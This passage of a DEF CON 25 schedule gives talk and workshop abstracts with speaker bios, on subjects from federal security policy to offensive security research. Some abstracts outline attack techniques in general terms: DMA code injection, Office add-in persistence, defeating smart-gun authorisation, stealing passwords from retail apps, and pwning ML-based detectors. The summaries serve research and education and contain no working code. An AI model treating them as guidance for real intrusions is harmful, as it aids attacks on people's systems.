Making legal and policy progress on security is hard, especially when it involves coordinating with teams inside and across federal agencies/departments. But, there *are* success stories. DOJ, FDA, FTC, and DoD have all evolved in positive directions in their approach to security over the last five years, engaging more robustly with the security research community. The panelists will introduce their respective agencies/ departments, explain their missions, and describe the evolution of their organizations' approach across time to security and security research. As always, the panelists look forward to answering your questions.

Andrea Matwyshyn
Andrea Matwyshyn is an academic and author whose work focuses on technology and innovation policy, particularly information security, consumer privacy, intellectual property, and technology workforce pipeline policy. She is a (tenured full) professor of law / professor of computer science (by courtesy) at Northeastern University, where she is the co-director of the Center for Law, Innovation, and Creativity (CLIC). Andrea is also a faculty affiliate of the Center for Internet and Society at Stanford Law School and a visiting research collaborator at the Center for Information Technology Policy at Princeton University, where she was the Microsoft Visiting Professor of Information Technology Policy during 2014-15. She is a Senior Fellow of the Cyber Statecraft Initiative at the Atlantic Council's Brent Scowcroft Center on International Security and a US-UK Fulbright Commission Cyber Security Scholar award recipient in 2016-2017. In 2014, she served as the Senior Policy Advisor/ Academic in Residence at the U.S. Federal Trade Commission. Prior to entering the academy, she was a corporate attorney in private practice.

Terrell McSweeny
Terrell McSweeny serves as a Commissioner of the Federal Trade Commission. When it comes to tech issues, Commissioner McSweeny has focused on the valuable role researchers and hackers can play protecting consumer data security and privacy. She opposes bad policy and legislative proposals like mandatory backdoors and the criminalization of hacking and believes that enforcers like the FTC should work with the researcher community to protect consumers. She wants companies to implement security by design, privacy by design and data ethics by design–but recognizes that, in the absence of regulation, enforcement and research are the only means of holding companies accountable for the choices they make in the ways that they hold and use consumer data.

@TMcSweenyFTC

Dr. Suzanne Schwartz
Dr. Suzanne Schwartz is the Associate Director for Science & Strategic Partnerships at FDA’s Center for Devices & Radiological Health (CDRH). In this role, she assists the CDRH Director and Deputy Director for Science in the development, execution and evaluation of the Center’s biomedical science and engineering programs. Suzanne is passionate about cultivating critical dialogue across sectors and across entities towards advancing innovation in the biomedical space and within healthcare, where complex multifaceted problems exist. Suzanne joined FDA in October 2010. Initially recruited as a Commissioner’s Fellow, she became a Medical Officer in the Office of Device Evaluation, transitioning in September 2012 to become the Director of CDRH’s Emergency Preparedness/Operations and Medical Countermeasures (EMCM) Program in the Office of the Center Director for the past 4 years. Among other public health concerns, her portfolio has most notably included medical device cybersecurity, for which she chairs CDRH’s Cybersecurity Working Group. She also co-chairs the Government Coordinating Council for Healthcare & Public Health critical infrastructure sector. Before FDA, Suzanne was a full time surgical faculty member at Weill Cornell Medical College, New York. Suzanne’s career has spanned the private sector as well, having served as Medical Director & Tissue Bank Director of Ortec International, a development stage medical device company focused on tissue engineering therapeutic approaches to burns and chronic wounds. Suzanne earned an MD from Albert Einstein College of Medicine, trained in General Surgery & Burn Trauma at the New York Presbyterian Hospital - Weill Cornell Medical Center; an executive MBA from NYU Stern School of Business, and completed the National Preparedness Leadership Initiative – Harvard School of Public Health & Kennedy School of Government.

Leonard Bailey
Leonard Bailey joined the Department of Justice's Terrorism and Violent Crime Section (TVCS) in 1991 where he handled litigation and investigations, managed departmental policies governing criminal enforcement and intelligence collection, and participated in the negotiation of international treaties concerning terrorist funding. He subsequently served as Special Counsel and Special Investigative Counsel to the Department's Inspector General while conducting investigations of senior Department officials and sensitive departmental programs. In 2000, he joined the Computer Crime and Intellectual Property Section (CCIPS) where he has prosecuted cases involving federal violations of computer crime and intellectual property statutes; advised on matters related to searching and seizing electronic evidence, investigating and prosecuting network intrusions, and conducting electronic surveillance; and chaired the Organization of American States' Group of Government Experts on Cybercrime. He has been Special Counsel for National Security in CCIPS since 2008. In 2009, he accepted a position as Senior Counselor to the Assistant Attorney General for the National Security Division, where he managed issues associated with cybersecurity, critical infrastructure protection, and national security investigations and operations involving cyber threats to national security. In 2012, he managed and set cyber policy for the Department of Justice as an Associate Deputy Attorney General before returning to the Criminal Division in 2013. Leonard received his B.A. from Yale University in 1987 and his J.D. from Yale Law School in 1991. He is an adjunct professor at Georgetown Law School, where he teaches cybersecurity law.

Lisa Wiswell
Lisa Wiswell worked for the better part of the past decade with the Department of Defense to shift its culture to interact more positively with the hacker community. At the Defense Digital Service, she hacked the Department of Defense bureaucracy and its antiquated and restrictive policies and processes. She was appointed Special Assistant to the Deputy Assistant Secretary of Defense for Cyber Policy in the Office of the Secretary of Defense where she supported senior DoD leaders by formulating and implementing policies and strategies to improve DoD’s ability to operate in digital space – specifically providing guidance and governance over the manning, training, and equipping of the Cyber Mission Force. Prior to serving in the Obama Administration, she served as Technology Portfolio Manager at the Defense Advanced Research Projects Agency overseeing a portfolio of cyberwarfare initiatives directly contributing to national security. Prior to supporting the DoD, Lisa worked on Capitol Hill for her home Member of Congress. She holds a BA in History and Political Science from the Maxwell School of Public Citizenship at Syracuse University, and a Masters in Technology Management from Georgetown University. Lisa is a privacy rights and STEM outreach advocate. She is now a Principal at Grimm and a Fellow at the Center for Strategic and International Studies.


Return to Index      -     

 

VMHV - Roman 1, Promenade Level - Friday - 17:00-17:45


Panel: Securing the Election Office: A Local Response to a Global Threat

PANEL BIOS

Jake Braun (moderator) bio
Jake Braun, CEO Cambridge Global and former White House-DHS Liaison

Jake Braun is CEO of Cambridge Global Advisors where he provides strategic direction and consulting for high profile cyber and national security initiatives. Prior to joining CGA, Mr. Braun was the Director of White House and Public Liaison for the Department of Homeland Security (DHS) where he was instrumental in the passage of the unprecedented Passenger Name Record (PNR) Agreement, one of the largest big data agreements in history. In addition, he worked on the development and implementation of the Homeland Security Advisory Council's Task Force on CyberSkills.

In 2009, Mr. Braun served on the Presidential Transition Team for the Obama Administration as Deputy Director for the National Security Agencies Review. Prior to that, Mr. Braun also worked as National Deputy Field Director to the 2008 Obama for America Campaign, along with multiple other federal, state and local campaigns around the nation over the years.

Mr. Braun is a fellow at the Council on CyberSecurity and is a strategic advisor to DHS and the Pentagon on cybersecurity. He is also faculty at the University of Chicago's Harris School of Public Policy where he teaches cybersecurity policy.


Tim Blute bio
Tim Blute, Homeland Security & Public Safety Program Director, National Governors Association

Timothy Blute serves as program director for the NGA Center for Best Practices Homeland Security & Public Safety Division. Blute focuses on cybersecurity, public safety communications and information sharing. Prior to joining NGA, Blute served as an intelligence analyst in the Counterterrorism Division of the Federal Bureau of Investigation, a detailee to the Office of the General Counsel at the National Security Law Branch, and an intern for the U.S. Department of the Treasury. Blute holds a J.D. from the American University Washington College of Law and a bachelor's degree in International Affairs from the George Washington University.


Erik Kamerling bio
Erik Kamerling
Senior Director, Cyber Security Technology at Center for Internet Security

Mr. Kamerling is a Senior Director at The Center for Internet Security with nineteen years of experience in the fields of advisory and consulting, network security assessment, penetration testing, vulnerability research, monitoring/incident response, and fundamental security research. His role at the Center for Internet Security is to spearhead technology developments for the Multi-State Information Sharing & Analysis Center (MSISAC). His current projects include global honeynet operations that study breaking threats that target State, Local, Territorial and Tribal entities, leading hunting and patrolling initiatives in the MSISAC, driving new capabilities in Albert network engineering, and security community outreach.

In the past, Erik has held lead positions at Mandiant, Symantec, RSA, and the SANS Institute. He enjoys writing and research on cyber intelligence topics and has driven the development of keynote speeches, research presentations, course-ware, advisories, papers, and hacking and penetration testing classes taught in a variety of venues.


Noah Praetz bio
Noah Praetz, Director of Elections for Suburban Cook County
Noah Praetz is an expert in state and federal election law. He is currently the Director of Elections for Suburban Cook County in Illinois, a role he assumed in 2013 after serving as the former Cook County Deputy Director of Elections and various other roles including Deputy Director, Manager of Planning and Preparation, Law Clerk and Staff Attorney.

Praetz is active in several election organizations, including the International Association of Clerks, Recorders, Election Officials and Treasurers. He is a graduate of Bradley University and DePaul College of Law. He lives in Indian Head Park with his wife, Megan O'Connell, and their three children.

Return to Index      -     

 

PHV - Milano VIII - Promenade Level - Saturday - 18:10-18:59


Passwords on a Phone

Sam Bowne

Almost all Android apps from major retailers store your password on the phone, which is dangerous and unnecessary. And they don't even use the Android KeyStore; they just use custom encryption schemes that generate a key in predictable ways, so passwords are easily recoverable. This is “fake encryption” – the data appears to be encrypted but in fact is not actually protected from attackers. I will present results of my tests of many top retailers, and demonstrate how to steal passwords from them. I will also list a few (very few) companies who actually protect their customers' passwords properly.

Sam Bowne (Twitter: @sambowne) has been teaching computer networking and security classes at CCSF since 2000. He has given talks at DEFCON, HOPE, BayThreat, LayerOne, and Toorcon, and taught classes at many other schools and teaching conferences. He has these things: BS, PhD, CEH, CISSP, WCNA, and a lot of T-shirts.


Return to Index      -     

 

PHV - Milano VIII - Promenade Level - Saturday - 14:10-14:30


Past, Present and Future of High Speed Packet Filtering on Linux

Gilberto Bertin, Cloudflare

As internet DDoS attacks get bigger and more elaborate, the importance of high performance network traffic filtering increases. Attacks of hundreds of millions of packets per second are now commonplace. In this session, we will introduce modern techniques for high speed network packet filtering on Linux. We will follow the evolution of the subject, starting with Iptables and userspace offload solutions (such as EF_VI and Netmap), discussing their use cases and their limitations. We will then move on to a new technology recently introduced in the Linux kernel called XDP (express data path), which works by hooking an eBPF program into the lowest possible layer in the Linux kernel network stack, allowing network traffic to be filtered at high speeds.

Gilberto Bertin (Twitter: @akajibi), originally from a little Italian town near Venice, loves tinkering with low level systems, especially networking code. After working on a variety of technologies like P2P VPNs and userspace TCP/IP stacks, he decided to move to London to help the Cloudflare DDoS team filter all the bad internet traffic.


Return to Index      -     

 

Demolabs - Table 3 - Sunday - 12:00-13:50


PCILeech

Ulf Frisk

Sunday from 1200-1350 at Table Three

Total physical pwnage and plenty of live demos in this action packed Demo Lab! The PCILeech direct memory access attack toolkit was presented at DEF CON 24 and quickly became popular amongst red teamers and governments alike. A year later major operating systems are still vulnerable by default. I will demonstrate how to take total control of Linux, Windows and macOS by PCIe DMA code injection. Kernels will be subverted, full disk encryption defeated, file systems mounted and shells spawned! All this by using affordable hardware and the open source PCILeech toolkit.

http://github.com/ufrisk/pcileech

Ulf Frisk
Ulf Frisk is a hacker/penetration tester working in the Swedish financial sector. Ulf focuses mainly on online banking security, penetration testing and IT security audits during daytime and low-level coding during nighttime. Ulf has been working professionally with security since 2011 and has a dark past as a developer.


Return to Index      -     

 

DEFCON - Track 2 - Sunday - 10:20-10:40


PEIMA (Probability Engine to Identify Malicious Activity): Using Power Laws to address Denial of Service Attacks

Sunday at 10:20 in Track 2

20 minutes | Art of Defense, Demo, Tool

Redezem Hacker

Denial of service. It requires a low level of resources and knowledge, it is very easy to deploy, it is very common and it is remarkable how effective it is overall. PEIMA is a brand new method of client side malicious activity detection based on mathematical laws, usually used in finance, text retrieval and social media analysis, that is fast, accurate, and capable of determining when denial of service attacks start and stop without flagging legitimate heavy interest in your server erroneously. However, denial of service attacks aren't the only type of anomalous activity you can look at with PEIMA. Learn what kinds of unusual identifying metrics you can get out of your network and users to help detect intrusions and, ultimately, defend your assets.

Redezem
Redezem hails from the southern hemisphere, specifically Perth, Australia, the most isolated capital city on the planet. He's been an avid computer tinkerer in this desolate, sunny, beach-ridden wasteland from a young age, and has been a "hacker" since he stole his dad's passwords to get at the internet as a kid. Having worked part time as a web application developer during his undergraduate degree in computer science, he specialised in intrusion detection in his honours year, and is currently pursuing his PhD on new and fantastic network anomaly detection mechanisms at Curtin University. He currently also lectures, and works part-time as a security consultant.


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 1 - Friday - 14:30-18:30


Penetration Testing in Hostile Environments: Client & Tester Security

Friday, 14:30 to 18:30 in Octavius 1

Wesley McGrew Director of Cyber Operations, HORNE Cyber Solutions

Brad Pierce Director of Network Security For HORNE Cyber

Penetration testers can have the tables turned on them by attackers, to the detriment of client and tester security. Vulnerabilities exist in widely-used penetration testing tools and procedures. Testing often takes place in hostile environments: across the public Internet, over wireless, and on client networks where attackers may already have a foothold. In these environments, common penetration testing practices can be targeted by third-party attackers. This can compromise testing teams in the style of "ihuntpineapples", or worse: quietly and over a long period of time. The confidentiality, integrity, and availability of client networks are also put at risk by "sloppy" testing techniques.

In this workshop, we present a comprehensive set of recommendations that can be used to build secure penetration testing operations. This includes technical recommendations, policies, procedures, and guidance on how to communicate and work with client organizations about the risks and mitigations. The goal is to develop testing practices that:
- ...are more professionally sound
- ...protect client organizations
- ...protect penetration testers' infrastructure, and
- ...avoid a negative impact on speed, agility, and creativity of testers

The recommendations are illustrated with entertaining and informative hands-on exercises. These include:
- Vulnerability analysis of a penetration testing device's firmware
- Quick and dirty code audits of high-risk testing tools
- Monitoring and hijacking post-exploitation command and control
- Layering security around otherwise insecure tools.

After this workshop, you will walk away with actionable recommendations for improving the maturity and security of your penetration testing operations, as well as an exposure to the technical aspects of protecting the confidentiality of sensitive client data. You will participate in hands-on exercises that illustrate the importance of analyzing your own tools for vulnerabilities, and learn how to think like an attacker that hunts attackers. You'll hear about the challenges that are inherent in performing penetration tests on sensitive client networks, and learn how to layer security around your practices to reduce the risks.

Prerequisites: To get the most out of this class, students should have the ability to read/follow code in many programming languages (C/C++, Python, PHP, etc.). Students should also be familiar with navigation and use of the Linux command line. Experience with penetration testing will be useful, but those new to penetration testing should not be discouraged. The entire point is to pick up good operational security habits.

Materials: Students who wish to participate in the hands-on exercises should bring a laptop with at least 8GB of RAM, the operating system of their choice, and VMware Workstation or Fusion installed (sign up for a trial license from VMware just before the conference, if necessary). Virtual machines will be provided on USB sneakernet, so you may prefer to bring/configure a burner laptop. One exercise uses Wi-Fi. Apart from that, everything takes place within the virtual machines, and you will be able to disconnect all of your physical networking interfaces.

Max students: 36 | Registration: https://dc25_mcgrew.eventbrite.com (Sold out!)

Wesley McGrew
Wesley McGrew oversees and participates in penetration testing in his role of Director of Cyber Operations for HORNE Cyber Solutions. He has presented on topics of penetration testing, vulnerabilities, and malware analysis at DEF CON and Black Hat USA. He teaches a self-designed course on reverse engineering to students at Mississippi State University, using real-world, high-profile malware samples. Wesley graduated from Mississippi State University's Department of Computer Science and Engineering and previously worked at the Distributed Analytics and Security Institute. He holds a Ph.D. in computer science for his research in vulnerability analysis of SCADA HMI systems.

Brad Pierce
Brad Pierce manages penetration testing engagements and network infrastructure as Director of Network Security For HORNE Cyber. He brings more than 10 years of experience in network deployment, management, support and internal customer technology support. Brad served eight years in the United States Marine Corps receiving an Honorable Discharge in 2003. Brad is a graduate of The University of Southern Mississippi with a Bachelor of Science in Business Administration with an emphasis in management information systems.


Return to Index      -     

 

DEFCON - Track 1 - Saturday - 10:00-10:30


Persisting with Microsoft Office: Abusing Extensibility Options

Saturday at 10:00 in 101 Track

20 minutes | Demo

William Knowles MWR InfoSecurity

One software product that red teamers will almost certainly find on any compromised workstation is Microsoft Office. This talk will discuss the ways that native functionality within Office can be abused to obtain persistence. The following opportunities for Office-based persistence will be discussed:

(1) WLL and XLL add-ins for Word and Excel - a legacy add-in that allows arbitrary DLL loading.
(2) VBA add-ins for Excel and PowerPoint - an alternative to backdoored template files, which executes whenever the applications load.
(3) COM add-ins for all Office products - an older cross-application add-in that leverages COM objects.
(4) Automation add-ins for Excel - user defined functions that allow command execution through spreadsheet formulae.
(5) VBA editor (VBE) add-ins for all VBA using Office products - executing commands when someone tries to catch you using VBA to execute commands.
(6) VSTO add-ins for all Office products - the newer cross-application add-in that leverages a special Visual Studio runtime.

Each persistence mechanism will be discussed in terms of its relative advantages and disadvantages for red teamers, in particular its complexity to deploy, its privilege requirements, and its applicability to Virtual Desktop Infrastructure (VDI) environments, which hinder the use of many traditional persistence mechanisms.

The talk isn't all red - there's also some blue to satisfy the threat hunters and incident responders amongst us. The talk will finish with approaches to detection and prevention of these persistence mechanisms.

William Knowles
William Knowles is a Security Consultant at MWR InfoSecurity. He is primarily involved in purple team activities, which involve objective-based testing to simulate real-world threats and helping organizations identify effective defenses against them with regard to both prevention and detection. Prior to joining the security industry, he completed a PhD in Computer Science at Lancaster University. His research interests include post-exploitation activities and offensive PowerShell.

@william_knows


Return to Index      -     

 

DEFCON - Track 2 - Friday - 15:00-15:45


Phone system testing and other fun tricks

Friday at 15:00 in Track 2

45 minutes | Demo, Tool

"Snide" Owen Hacker

Phone systems have long been forgotten in favor of more modern technology. The phreakers of the past left us a wealth of information; however, as things have moved forward, the environments as a whole have become more complex. As a result they are often forgotten, sidetracked or not thoroughly tested. We'll cover the VoIP landscape and how to test the various components, focussing on PBX and IVR testing. The security issues that may be encountered are mapped to the relevant OWASP category for familiarity. Moving on, I'll demonstrate other fun ways that you can utilize a PBX within your future offensive endeavours.

"Snide" Owen
"Snide" Owen has worked in various IT fields from tech support to development. Combining that knowledge he moved into the security field by way of Application Security and is now on an offensive security research team. He enjoys both making and breaking, tinkering with various technologies, and has experimented for prolonged periods with PBXs and the obscure side of VoIP.


Return to Index      -     

 

Demolabs - Table 6 - Saturday - 10:00-11:50


PIV OPACITY

Christopher Williams

Saturday from 1000-1150 at Table Six

Audience: Authentication, Mobile, Embedded Security, Biohacking

OPACITY is a fast, lightweight asymmetric encryption protocol, adopted as an open standard by NIST, ANSI, and Global Platform. OPACITY, originally designed for payment and identity applications, provides a method for securing the NFC channel of low power devices with embedded secure hardware, such as smart cards. I will show an Android demonstration leveraging this open standard, as defined in NIST SP 800-73-4, to securely produce derived credentials and provide flexible and private authentication. While this demo is designed to showcase the Federal PIV standard, the OPACITY algorithm and concepts are broadly applicable to provide secure transactions in IoT, biohacking, and other low power embedded systems.

https://youtu.be/ftn8-Cth554

Christopher Williams
Dr. Christopher Williams specializes in the implementation and evaluation of information assurance and data collection techniques to solve emerging problems around transaction security and privacy in IoT, fintech, and transportation. Dr. Williams has a Ph.D. in Physics from University of Chicago, where his dissertation research focused on design, prototyping, and field deployment of novel detectors for particle astrophysics. He has diverse scientific experience with expertise in systems integration, instrumentation, experimental design, and real-time data acquisition with a focus on systematic error mitigation. He has applied his expertise to validate standards compliance in secure messaging protocols between a smart card and host; and to study the integration of commercial cryptography solutions into a government approved authentication infrastructure for mobile platforms.


Return to Index      -     

 

Wireless - Florentine BR I & II - Promenade Level - Saturday - 13:00-13:25


POCSAG Amateur Pager Network

No description available


Return to Index      -     

 

DEFCON - Track 4 - Saturday - 17:00-17:45


Popping a Smart Gun

Saturday at 17:00 in Track 4

45 minutes | Demo, Exploit

Plore Hacker

Smart guns are sold with a promise: they can be fired only by authorized parties. That works in the movies, but what about in real life? In this talk, we explore the security of one of the only smart guns available for sale in the world. Three vulnerabilities will be demonstrated. First, we will show how to make the weapon fire even when separated from its owner by a considerable distance. Second, we will show how to prevent the weapon from firing even when authorized by its owner. Third, we will show how to fire the weapon even when not authorized by its owner, with no prior contact with the specific weapon, and with no modifications to the weapon.

Plore
Plore is an electrical engineer and embedded software developer based in the United States. At DEF CON 24, he spoke about cracking high-security electronic safe locks.

@_plore


Return to Index      -     

 

DEFCON - Track 1 - Thursday - 12:00-12:45


Porosity: A Decompiler For Blockchain-Based Smart Contracts Bytecode

Thursday at 12:00 in 101 Track

45 minutes | Demo, Tool

Matt Suiche Founder, Comae Technologies

Ethereum is gaining significant popularity in the blockchain community, mainly because it is designed in a way that enables developers to write decentralized applications (Dapps) and smart contracts using blockchain technology.

The Ethereum blockchain is a consensus-based, globally executed virtual machine, also referred to as the Ethereum Virtual Machine (EVM), which implements its own micro-kernel supporting a handful of instructions along with its own stack, memory and storage. This enables the radically new concept of distributed applications.

Contracts live on the blockchain in an Ethereum-specific binary format (EVM bytecode). However, contracts are typically written in a high-level language such as Solidity and then compiled into bytecode to be uploaded to the blockchain. Solidity is a contract-oriented, high-level language whose syntax is similar to that of JavaScript.

This new paradigm of applications opens the door to many possibilities and opportunities. Blockchains are often referred to as secure by design, but now that they can embed applications, this raises multiple questions regarding architecture, design, attack vectors and patch deployment.

As we reverse engineers know, having access to source code is often a luxury. Hence the need for an open-source tool like Porosity: a decompiler that turns EVM bytecode into readable Solidity-syntax contracts, enabling static and dynamic analysis of compiled contracts.

Matt Suiche
Matt Suiche is recognized as one of the world's leading authorities on memory forensics and application virtualization.

He is the founder of the United Arab Emirates-based cyber-security start-up Comae Technologies. Prior to founding Comae, he was the co-founder & Chief Scientist of the application virtualization start-up CloudVolumes, which was acquired by VMware in 2014. He also worked as a researcher for the Netherlands Forensic Institute.

His most notable research contributions enabled the community to perform memory-based forensics on Mac OS X memory snapshots as well as Windows hibernation files.
Since 2009, Matt has been recognized as a Microsoft Most Valuable Professional in Enterprise Security due to his various contributions to the community.

@msuiche


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 1 - Saturday - 10:30-14:30


Practical BLE Exploitation for Internet of Things

Saturday, 10:30 to 14:30 in Octavius 1

Aditya Gupta Founder, Attify

Dinesh Shetty Security Innovation

Practical BLE Exploitation for Internet of Things is a new training class focusing on exploiting the numerous IoT devices that use BLE as their communication medium.

Bluetooth Low Energy (or BLE) is found in most of the popular IoT and smart devices - be it smart home automation, retail, medical devices and more. This class will go through the internals of BLE from a security perspective, and then jump right into how you could interact with BLE devices, all the way to taking control over a complete IoT device using BLE exploitation techniques.

At the end, we will also look at some of the automation tools and scripts you can use/write in order to make the process much faster - as it's required in a pentest.

Prerequisites:
- Basic Linux knowledge
- Interest in IoT security

Materials:
- Laptop with 2 available USB ports
- 2 Ubuntu 16.04 VM instances (either one as host and one in a VM, or both inside separate VMs)
- Instructor will provide additional tools and devices to use during the workshop

Max students: 35 | Registration: https://dc25_gupta.eventbrite.com (Sold out!)

Aditya Gupta
Aditya Gupta (@adi1391) is the founder and principal consultant of Attify, a specialized IoT and mobile security firm, and a leading mobile security expert and evangelist.

He has done a lot of in-depth research on mobile application security and IoT device exploitation. He is also the creator and lead instructor for the popular training course "Offensive Internet of Things Exploitation," which has been sold out at numerous places including Black Hat US 2015, Black Hat US 2016, Brucon etc.

He is also the author of the popular Android security book "Learning Pentesting for Android Devices," which has sold over 15,000 copies since it was published in March 2014. He has also discovered serious web application security flaws in websites such as Google, Facebook, PayPal, Apple, Microsoft, Adobe and many more.

He has also published a research paper on ARM Exploitation titled "A Short Guide on ARM Exploitation." In his previous roles, he has worked on mobile security, application security, network penetration testing, developing automated internal tools to prevent fraud, finding and exploiting vulnerabilities and so on.

He is also a frequent speaker and trainer at numerous international security conferences including Black Hat, DefCon, Syscan, OWASP AppSec, PhDays, Brucon, Toorcon, Clubhack amongst others, and also provides private and customized training programmes for organizations.

Dinesh Shetty
Dinesh leads the Mobile Security Testing Center of Excellence at Security Innovation. He has performed innumerable penetration tests on Web, Mobile and IoT technologies; however, his core area of expertise is Mobile and Embedded application pentesting and exploitation. He is an accomplished author and speaker, and his research has been published in multiple security zines and sites.

Dinesh Shetty has previously presented his work at security conferences around Europe, Boston, New York, Australia, India and a bunch of Middle East and South East Asia countries. He continues to enhance his knowledge by undergoing security trainings and certifications around the world.



Workshops - ( Sold Out ) - Octavius 7 - Saturday - 10:30-14:30


Practical Malware Analysis: Hands-On

Saturday, 10:30 to 14:30 in Octavius 7

Sam Bowne

Devin Duffy-Halseth

Dylan James Smith

Learn how to analyze Windows malware samples, with a hands-on series of projects in a fun, CTF-style environment. There are four levels of analysis challenges.

1. Basic static analysis with file, strings, PEiD, PEview, Dependency Walker, and VirusTotal
2. Basic dynamic analysis with Process Monitor, Process Explorer, RegShot, and Wireshark
3. Advanced static analysis with IDA Pro Free and Hopper
4. Advanced dynamic analysis with Ollydbg and Windbg

The first challenges are easy enough for beginners, and the later ones get difficult enough to interest intermediate security professionals. We will demonstrate the challenges, discuss the technologies and techniques, and help participants get through them as needed.

These challenges use harmless malware samples from the "Practical Malware Analysis" book by Michael Sikorski and Andrew Honig.

All materials and challenges are freely available at samsclass.info, including slide decks, video lectures, and hands-on project instructions. They will remain available after the workshop ends.

Prerequisites: Participants should be familiar with basic C programming. Experience with developing Windows applications, assembly language, and debuggers is helpful but not necessary.

Materials: Participants must bring a laptop (any OS) with VMware or VirtualBox installed on it. Each participant will need a 32-bit Windows virtual machine to run malware samples. USB sticks with a Windows Server 2008 VM will be available for students to copy. Some projects also use a Kali Linux VM to simulate the Internet, but that's not required.

Max students: 80 | Registration: https://dc25_bowne.eventbrite.com (Sold out!)

Sam Bowne
Sam Bowne has been teaching computer networking and security classes at City College San Francisco since 2000. He has given talks and hands-on trainings at DEFCON, HOPE, RSA, B-Sides SF, B-Sides LV, and many other cons. He has a PhD and a CISSP and a lot of T-shirts.

Devin Duffy-Halseth
I really love hearing about different malware attack vectors and APT campaigns. I'm currently seeking a junior pentesting position.

Dylan James Smith
Dylan James Smith has assisted Sam Bowne with hands-on workshops at DEF CON, RSA, B-Sides LV and other conferences. He has worked in and around the computer support industry since adolescence. Now he’s old(er.) Currently focused on learning and teaching "the cybers."



Workshops - ( Sold Out ) - Octavius 4 - Saturday - 14:30-18:30


Principles on Leveraging PowerShell for Red Teams

Saturday, 14:30 to 18:30 in Octavius 4

Carlos Perez Director of Reverse Engineering

This workshop will focus on the fundamentals of how PowerShell is leveraged by an attacker for code execution and post-exploitation. We will also cover how the security maturity of a target organization affects the techniques used, and ways to operate around some of the controls.

Prerequisites: Basic Windows sysadmin knowledge, basic scripting knowledge and an understanding of PowerShell basics:

- What is PowerShell
- Cmdlets and Modules
- Using help and documentation
- Pipeline basics

Materials: Laptop with a Win10 Ent VM with Office trial (they can download the 90-day demos from MS) and Sysinternals Sysmon installed.

Max students: 72 | Registration: https://dc25_perez.eventbrite.com (Sold out!)

Carlos Perez
Carlos Perez is the Director of Reverse Engineering at a security vendor and also worked as a Sr Solution Architect for a large IT Integrator in the area of security. He has won the Microsoft MVP award several years for his work on PowerShell and Enterprise Security. He is mostly known for his contributions to the Metasploit Framework and as a co-host of the Security Weekly podcast.



CPV - Florentine Ballroom 4 - Saturday - 11:30-12:00


Title:
Privacy is Not An Add-On: Designing for Privacy from the Ground Up

Author:
Alisha Kloc

Abstract:
You want to design customer-focused, easy-to-use products that your customers will love - but you aren't doing your job if you wait until the last minute (or beyond!) to think about privacy. Tacking on privacy features as an afterthought isn't only bad for your users, it's also bad for your company. Privacy starts with your backend systems and carries forward through your product development cycle, your user testing, your product release, and all the way to your customer support. Learn how to build privacy into your products from the ground up, and create an awesome privacy story for both your company and your users.

Bio:
Alisha Kloc has worked in the security and privacy industry for over eight years, at companies ranging from startups to global powerhouses. Her focus is on protecting users' data and developing industry-leading security and privacy programs. She is an advocate for user data protection, speaking at conferences across the US and Europe to highlight security & privacy issues and encourage people to choose security & privacy careers. Alisha is passionate about data security and user privacy, and believes in combining engineering, technology, policy, and culture to ensure users' protection.
Twitter handle of presenter(s): @alishakloc


Demolabs - Table 1 - Sunday - 10:00-11:50


probespy

stumblebot

Sunday from 1000-1150 at Table One

Audience: offense/recon/surveillance

Probespy is a dumb and dirty tool for analyzing directed and broadcast probe request data sent by wifi client devices. It assists in locating where wireless client devices have been (geolocation) and creating behavioral profiles of the person(s) owning the device via the identification of known SSIDs.

https://github.com/stumblebot/probespy

stumblebot
Stumblebot uses computers a lot. Currently he is paid to use computers on behalf of CDW's infosec team.



CPV - Florentine Ballroom 4 - Friday - 13:00-14:00


Title:
Protecting Users' Privacy in a Location-Critical Enterprise: The Challenges of 9-1-1 Location

Author:
Trey Forgety

Abstract:
Precise location data can reveal the most sensitive details of a person's life. But, in an emergency, it's the most important part of saving that life. This talk will detail how 9-1-1 systems acquire, use, and store sensitive location data today, and how that process will change as we transition to an all-IP Next Generation 9-1-1 world.

Bio:
Trey Forgety is Director of Government Affairs and Information Security Issues at NENA: The 9-1-1 Association. A physicist, lawyer, sailor, and inveterate tinkerer, Trey served two years as a Presidential Management Fellow with tours in DHS, the FCC, and NTIA, where he worked with the White House to develop policy for a nation-wide LTE network for public safety, known as FirstNet. By day, he handles legal, regulatory, and legislative issues affecting the 9-1-1 sector. By night, he handles the InfoSec issues, too. #SmallNonProfitLife
Twitter handle of presenter(s): @cincvolflt


BHV - Pisa Room - Friday - 11:00-11:29


Title: Psychoactive Chemicals in Combat

Speaker: Amanda Plimpton/Evan Anderson

Amanda Plimpton/Evan Anderson:
Collaborators Amanda Plimpton and Evan Anderson are active in the body augmenting community and excited to see the current growth in citizen science. Small groups and individuals who choose to pursue lines of inquiry and conduct ethical, methodical experiments are the key to the next series of breakthroughs that we will see across many sectors. Citizen scientists are people driven to investigate, experiment and seek answers. Whether they channel their passionate interests into a start-up business or stay in the nonprofit sector, they will continue to make important contributions in their fields. Our goal as speakers here is more modest: we are bringing forward research as a starting point for ourselves and our audience. Human experimentation has a long (and dark) history and today is fraught with ethical dilemmas and tensions. By looking at it through the lens of military experiments with a focus on psychoactive drugs, we hope to add a small amount of research to the open source science body of work and to highlight the need for sound, ethically sourced data. Hopefully we will provoke thoughtful discussions around modern human experiments.

Abstract:
By looking at key experiments and trials done by the military we can learn about psychoactive chemicals and protocols that work, and don't work, on humans. From biological enhancement to chemical deterrents, there is a wealth of information that grassroots scientists and body augmenters can use for their research and experiments.




Workshops - ( Sold Out ) - Octavius 6 - Saturday - 14:30-18:30


Pwning machine learning systems

Saturday, 14:30 to 18:30 in Octavius 6

Clarence Chio Security Researcher

Anto Joseph Security Engineer, Intel

Pwning machine learning systems is an offensive-focused workshop that gives attendees a whirlwind introduction to the world of adversarial machine learning. This three-hour workshop will not be your run-of-the-mill introduction-to-machine-learning course (are you kidding? you can get that from a thousand different places online!), but will focus on hands-on examples, and actually attacking these systems. Every concept covered in this workshop will be backed up with either a worked example or a challenge activity (done in groups of 1 to 3), with minimal lecturing and maximum "doing". By the end of the workshop, students will be able to confidently pwn machine-learning-powered malware classifiers, intrusion detectors, and WAFs. We will cover the three major kinds of attacks on machine learning and deep learning systems - model poisoning, adversarial generation, and reinforcement learning attacks. As a bonus, attendees will emerge from the session with a fully-upgraded machine learning B.S. detector, giving them the ability to call B.S. on any "next-generation system" that claims to be impenetrable because of machine learning. This is an intermediate technical class suitable for attendees with some ability to read and write basic Python code. To get the most out of this workshop, a surface-level understanding of machine learning is good (be able to give a one-line answer to the question "What is machine learning?").

